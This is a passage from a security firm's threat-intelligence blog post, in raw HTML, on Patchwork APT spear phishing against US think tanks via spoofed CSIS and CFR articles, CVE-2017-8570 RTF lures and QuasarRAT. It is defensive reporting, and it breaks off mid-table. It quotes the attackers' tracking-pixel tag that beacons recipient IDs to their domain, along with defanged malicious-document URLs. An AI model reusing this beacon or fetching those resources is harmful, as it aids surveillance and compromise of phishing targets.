CINXE.COM

<!DOCTYPE html>      <html lang="en-US" class="no-js">  <meta charset="UTF-8"> <title>Patchwork APT Group Targets US Think Tanks | Volexity</title> <meta name="HandheldFriendly" content="True"> <meta name="MobileOptimized" content="320"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="cleartype" content="on"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:site" content="@Volexity"> <meta name="twitter:creator" content="@Volexity"> <meta name="twitter:title" content="Patchwork APT Group Targets US Think Tanks"> <meta name="twitter:description" content="In March and April 2018, Volexity identified multiple spear phishing campaigns attributed to Patchwork, an Indian APT group also known as Dropping Elephant. This increase in threat activity was consistent with other observations documented over the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on Chinese organizations and Trend Micro noting targets in South Asia. From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. In three observed spear phishing campaigns, the threat actors leveraged domains and themes mimicking those of well-known think tank organizations in the United States. The group lifted articles and themes from […]"> <link rel="apple-touch-icon" sizes="180x180" href="https://www.volexity.com/wp-content/themes/volexity/apple-touch-icon.png"> <link rel="icon" type="image/png" href="https://www.volexity.com/wp-content/themes/volexity/favicon-32x32.png" sizes="32x32"> <link rel="icon" type="image/png" href="https://www.volexity.com/wp-content/themes/volexity/favicon-16x16.png" sizes="16x16"> <link rel="icon" type="image/png" href="https://www.volexity.com/wp-content/themes/volexity/favicon.ico"> <link rel="manifest" href="https://www.volexity.com/wp-content/themes/volexity/manifest.json"> <meta name="theme-color" content="#12BEF0"> <meta property="og:image" content="https://www.volexity.com/wp-content/uploads/2018/01/Volexity-Logo-Full-Stacked-2019-1000px.jpg" />  <script async src="https://www.googletagmanager.com/gtag/js?id=G-WRSX85NK29"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-WRSX85NK29'); </script> <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />  <link rel="canonical" href="https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="article" /> <meta property="og:title" content="Patchwork APT Group Targets US Think Tanks" /> <meta property="og:description" content="In March and April 2018, Volexity identified multiple spear phishing campaigns attributed to Patchwork, an Indian APT group also known as Dropping Elephant. This increase in threat activity was consistent with other observations documented over the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on Chinese organizations and Trend Micro noting targets in South Asia. From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. In three observed spear phishing campaigns, the threat actors leveraged domains and themes mimicking those of well-known think tank organizations in the United States. The group lifted articles and themes from […]" /> <meta property="og:url" content="https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" /> <meta property="og:site_name" content="Volexity" /> <meta property="article:publisher" content="https://www.facebook.com/volexity/" /> <meta property="article:published_time" content="2018-06-07T18:23:38+00:00" /> <meta property="article:modified_time" content="2024-11-21T16:35:48+00:00" /> <meta property="og:image" content="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group.png" /> <meta name="author" content="Volexity" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Article","@id":"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/#article","isPartOf":{"@id":"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"},"author":{"name":"Volexity","@id":"https://www.volexity.com/#/schema/person/02fe2efcd383b72f0f2d1e573fce91f2"},"headline":"Patchwork APT Group Targets US Think Tanks","datePublished":"2018-06-07T18:23:38+00:00","dateModified":"2024-11-21T16:35:48+00:00","mainEntityOfPage":{"@id":"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"},"wordCount":2139,"commentCount":0,"publisher":{"@id":"https://www.volexity.com/#organization"},"image":{"@id":"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/#primaryimage"},"thumbnailUrl":"https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group.png","keywords":["APT","Patchwork"],"articleSection":["Threat Intelligence"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/#respond"]}]},{"@type":"WebPage","@id":"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/","url":"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/","name":"Patchwork APT Group Targets US Think Tanks | Volexity","isPartOf":{"@id":"https://www.volexity.com/#website"},"primaryImageOfPage":{"@id":"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/#primaryimage"},"image":{"@id":"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/#primaryimage"},"thumbnailUrl":"https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group.png","datePublished":"2018-06-07T18:23:38+00:00","dateModified":"2024-11-21T16:35:48+00:00","breadcrumb":{"@id":"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/#primaryimage","url":"https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group.png","contentUrl":"https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group.png","width":1396,"height":830},{"@type":"BreadcrumbList","@id":"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.volexity.com/"},{"@type":"ListItem","position":2,"name":"Blog","item":"https://www.volexity.com/blog/"},{"@type":"ListItem","position":3,"name":"Patchwork APT Group Targets US Think Tanks"}]},{"@type":"WebSite","@id":"https://www.volexity.com/#website","url":"https://www.volexity.com/","name":"Volexity | Memory Forensics, Cybersecurity Threat Intelligence & Incident Response","description":"","publisher":{"@id":"https://www.volexity.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.volexity.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://www.volexity.com/#organization","name":"Volexity Inc.","alternateName":"Volexity - Forensic Memory Analysis","url":"https://www.volexity.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.volexity.com/#/schema/logo/image/","url":"https://www.volexity.com/wp-content/uploads/2018/01/Volexity-Logo-Full-Stacked-2019-1000px.jpg","contentUrl":"https://www.volexity.com/wp-content/uploads/2018/01/Volexity-Logo-Full-Stacked-2019-1000px.jpg","width":1000,"height":1000,"caption":"Volexity Inc."},"image":{"@id":"https://www.volexity.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/volexity/","https://x.com/Volexity","https://www.linkedin.com/company/volexity/","https://github.com/volexity","https://infosec.exchange/@volexity"]},{"@type":"Person","@id":"https://www.volexity.com/#/schema/person/02fe2efcd383b72f0f2d1e573fce91f2","name":"Volexity","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.volexity.com/#/schema/person/image/","url":"https://secure.gravatar.com/avatar/5af358e7aecb5d6d516fa59fd5f40b38?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/5af358e7aecb5d6d516fa59fd5f40b38?s=96&d=mm&r=g","caption":"Volexity"}}]}</script>  <link rel='stylesheet' id='wp-block-library-css' href='https://www.volexity.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='cookie-notice-front-css' href='https://www.volexity.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=2.4.18' type='text/css' media='all' /> <link rel='stylesheet' id='main-style-css' href='https://www.volexity.com/wp-content/themes/volexity/dist/styles/styles.min.css?ver=6.6.2' type='text/css' media='screen, print' /> <script type="text/javascript" id="cookie-notice-front-js-before"> /* <![CDATA[ */ var cnArgs = {"ajaxUrl":"https:\/\/www.volexity.com\/wp-admin\/admin-ajax.php","nonce":"487acc2e0d","hideEffect":"fade","position":"bottom","onScroll":false,"onScrollOffset":100,"onClick":false,"cookieName":"cookie_notice_accepted","cookieTime":2592000,"cookieTimeRejected":2592000,"globalCookie":false,"redirection":false,"cache":false,"revokeCookies":false,"revokeCookiesOpt":"automatic"}; /* ]]> */ </script> <script type="text/javascript" src="https://www.volexity.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=2.4.18" id="cookie-notice-front-js"></script> <script type="text/javascript" src="https://www.volexity.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" src="https://www.volexity.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <link rel="https://api.w.org/" href="https://www.volexity.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://www.volexity.com/wp-json/wp/v2/posts/1073" /><link rel='shortlink' href='https://www.volexity.com/?p=1073' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://www.volexity.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.volexity.com%2Fblog%2F2018%2F06%2F07%2Fpatchwork-apt-group-targets-us-think-tanks%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://www.volexity.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.volexity.com%2Fblog%2F2018%2F06%2F07%2Fpatchwork-apt-group-targets-us-think-tanks%2F&format=xml" /> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ </style>  </head> <body class="post-template-default single single-post postid-1073 single-format-standard cookies-not-set ie ie7 windows"> <header class="header"> <div class="header-top-container"> <div class="container"> <ul id="menu-sub-left" class="header-sub-left"><li id="menu-item-2116" class="icon-triangle menu-item menu-item-type-post_type menu-item-object-page menu-item-2116"><a href="https://www.volexity.com/company/contact/demo-request/" class="icon-triangle">Request A Demo</a></li> </ul> <ul id="menu-sub-right" class="header-sub-right"><li id="menu-item-1213" class="icon-warning menu-item menu-item-type-post_type menu-item-object-page menu-item-1213"><a href="https://www.volexity.com/company/contact/breach-assistance/" class="icon-warning">Breach Assistance</a></li> </ul> </div> </div> <div class="header-container"> <div class="container"> <a class="header-logo" href="https://www.volexity.com"><img src="https://www.volexity.com/wp-content/themes/volexity/dist/images/logo.png" alt="Volexity"></a> <div class="header-menu"> <ul id="menu-main-navigation" class="header-menu-list"><li id="menu-item-376" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-376"><a href="https://www.volexity.com/products-overview/">Products</a> <ul class="sub-menu"> <li id="menu-item-48" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-48"><a href="https://www.volexity.com/products-overview/">Products Overview</a></li> <li id="menu-item-50" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50"><a href="https://www.volexity.com/products-overview/volcano/">Volcano</a></li> <li id="menu-item-49" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-49"><a href="https://www.volexity.com/products-overview/surge/">Surge</a></li> </ul> </li> <li id="menu-item-377" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-377"><a href="https://www.volexity.com/services-overview/">Services</a> <ul class="sub-menu"> <li id="menu-item-55" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55"><a href="https://www.volexity.com/services-overview/">Services Overview</a></li> <li id="menu-item-52" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-52"><a href="https://www.volexity.com/services-overview/incident-response/">Incident Response</a></li> <li id="menu-item-53" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-53"><a href="https://www.volexity.com/services-overview/network-security-monitoring/">Network Security Monitoring</a></li> <li id="menu-item-54" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54"><a href="https://www.volexity.com/services-overview/proactive-threat-assessments/">Proactive Threat Assessments</a></li> <li id="menu-item-56" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-56"><a href="https://www.volexity.com/services-overview/threat-intelligence/">Threat Intelligence</a></li> <li id="menu-item-2394" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2394"><a href="https://www.volexity.com/services-overview/mergers-acquisitions-cybersecurity-assessments/">M&A Cybersecurity Assessments</a></li> </ul> </li> <li id="menu-item-385" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-385"><a href="https://www.volexity.com/company/about/">Company</a> <ul class="sub-menu"> <li id="menu-item-41" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41"><a href="https://www.volexity.com/company/about/">About</a></li> <li id="menu-item-43" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-43"><a href="https://www.volexity.com/company/news-press/">News & Press</a></li> <li id="menu-item-1849" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1849"><a href="https://www.volexity.com/company/careers/">Careers</a></li> <li id="menu-item-1824" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1824"><a href="https://www.volexity.com/company/internships/">Internships</a></li> <li id="menu-item-1718" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1718"><a href="https://www.volexity.com/company/resources/">Resources</a></li> </ul> </li> <li id="menu-item-39" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-39"><a href="https://www.volexity.com/blog/">Blog</a></li> <li id="menu-item-45" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-45"><a href="https://www.volexity.com/company/contact/">Contact</a></li> </ul> </div> <div class="mobile-menu--holder"> <div class="mobile-menu"></div> </div> </div> </div> </header> <div class="int-header s5"> <div class="container"> <section class="int-header-hold col-sm-12"> blog </section> </div> </div> <main class="main"> <div class="container"> <section class="row int"> <article class="col-sm-8"> <div class="post-content composition"> <h2 class="post-title">Patchwork APT Group Targets US Think Tanks</h2> <p class="post-date">June 7, 2018</p> <p class="post-byline">by Matthew Meltzer, Sean Koessel, Steven Adair</p> <div class="post-single-social"> <a class="post-single-social-share" data-share-channel="facebook" data-title="Patchwork APT Group Targets US Think Tanks" data-description="In March and April 2018, Volexity identified multiple spear phishing campaigns attributed to Patchwork, an Indian APT group also known as Dropping Elephant. This increase in threat activity was consistent with other observations documented over the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on Chinese organizations and Trend Micro noting targets in South Asia. From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. In three observed spear phishing campaigns, the threat actors leveraged domains and themes mimicking those of well-known think tank organizations in the United States. The group lifted articles and themes from […]" data-url="https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" data-image="" data-caption="Volexity"><i class="icon icon-facebook-share"></i><span class="sr-only">Facebook</span></a> <a class="post-single-social-share" data-share-channel="twitter" data-text="Patchwork+APT+Group+Targets+US+Think+Tanks" data-url="https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" data-hashtags="volexity" data-via="Volexity"><i class="icon icon-twitter-share"></i><span class="sr-only">Twitter</span></a> <a class="post-single-social-share" data-share-channel="email" data-post-id="1073"><i class="icon icon-mail-share"></i><span class="sr-only">Email</span></a> </div> <p><img fetchpriority="high" decoding="async" class="alignnone wp-image-1074 size-full" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group.png" alt="" width="1396" height="830" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group.png 1396w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group-300x178.png 300w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group-768x457.png 768w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork-APT-Group-1024x609.png 1024w" sizes="(max-width: 1396px) 100vw, 1396px" /><span style="font-size: 1.6rem;">In March and April 2018, Volexity identified multiple spear phishing campaigns attributed to Patchwork, an Indian APT group also known as Dropping Elephant. This increase in threat activity was consistent with other observations</span><span style="font-size: 1.6rem;"> documented over the last few months in blogs by 3</span><span style="font-size: 1.6rem;">60 Threat Intelligence Center analyzing attacks on </span><a style="font-size: 1.6rem; background-color: #ffffff;" href="https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/">Chinese organizations</a><span style="font-size: 1.6rem;"> and Trend Micro noting targets in </span><a style="font-size: 1.6rem; background-color: #ffffff;" href="https://blog.trendmicro.com/trendlabs-security-intelligence/confucius-update-new-tools-and-techniques-further-connections-with-patchwork/">South Asia</a><span style="font-size: 1.6rem;">. From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages.<br /> </span></p> <p>In three observed spear phishing campaigns, the threat actors leveraged domains and themes mimicking those of well-known think tank organizations in the United States. The group lifted articles and themes from the <a href="https://www.cfr.org/">Council on Foreign Relations (CFR)</a>, the <a href="https://www.csis.org/">Center for Strategic and International Studies (CSIS),</a> and the <a href="https://www.merics.org/">Mercator Institute for China Studies (MERICS)</a> for use in their spear phishing lures and malicious Rich Text Format (RTF) documents. Strangely, in one case, the threat actors also appear to have used a domain name similar to the <a href="https://www.fpri.org/">Foreign Policy Research Institute (FPRI)</a> in a message purporting to be from CFR. Each of the spear phishing attacks contained links to .doc files, which were really RTF documents that attempt to exploit CVE-2017-8570 (Composite Moniker). The threat actors appear to have leveraged publicly available exploit code that can be found on Github at the URL: https://github.com/rxwx/CVE-2017-8570. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. Details of the malware and the associated attacks are listed below.</p> <h3>Spear Phishing Messages</h3> <p>Each e-mail was sent from the attacker-controlled domain mailcenter.support. This domain was not only used to send the phishing e-mails, but also to track which targets opened the e-mail. Within each of the HTML-formatted messages, an embedded image tag is used to beacon home to the attacker's domain, containing an unique identifier specific to the recipient.</p> <blockquote><p><em><img src=3D"hxxps://www.mailcenter.support/track/<strong><unique_32_byte_identifier></strong>" width=3D"0" height=3D"0" /></em></p></blockquote> <p>While the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant) remained the same, certain elements differed across campaigns observed. Details on each of the messages are listed below.</p> <h5>Message 1:</h5> <table style="border: 1px solid #c6c6c6;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px;" valign="middle">Headers</th> <th style="text-align: left; color: #505050; padding: 6px;" valign="middle">Received: by mailcenter.support</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Sender</th> <td style="padding: 6px;">China Policy Analysis <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="7b0b0e191712181a0f121415083b181312151a0b14171218021a151a17020812085514091c">[email protected]</a>></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Subject</th> <td style="padding: 6px;">Chinas Arctic Dream</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Body</th> <td style="padding: 6px;"><span class="nolink">Content and images included within the e-mail body were a direct copy of the following CSIS article:</span></p> <p><span class="nolink"> <span class="nolink">https://www.csis.org/analysis/chinas-arctic-dream</span></span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Notes</th> <td style="padding: 6px;"><span class="nolink"><span class="nolink"><span class="nolink"><span class="nolink">The hyperlinked text <strong>Download File of "China's Arctic Dream"</strong> within the e-mail body lead to a malicious RTF document located at the URL</span></span></span></span></p> <p><span class="nolink"><span class="nolink"><span class="nolink"><span class="nolink"> <strong>hxxp://chinapolicyanalysis.org/Chinas_Arctic_Dream.doc</strong>.</span></span></span></span></p> <p><span class="nolink">The chinapolicyanalysis.org domain was used <span 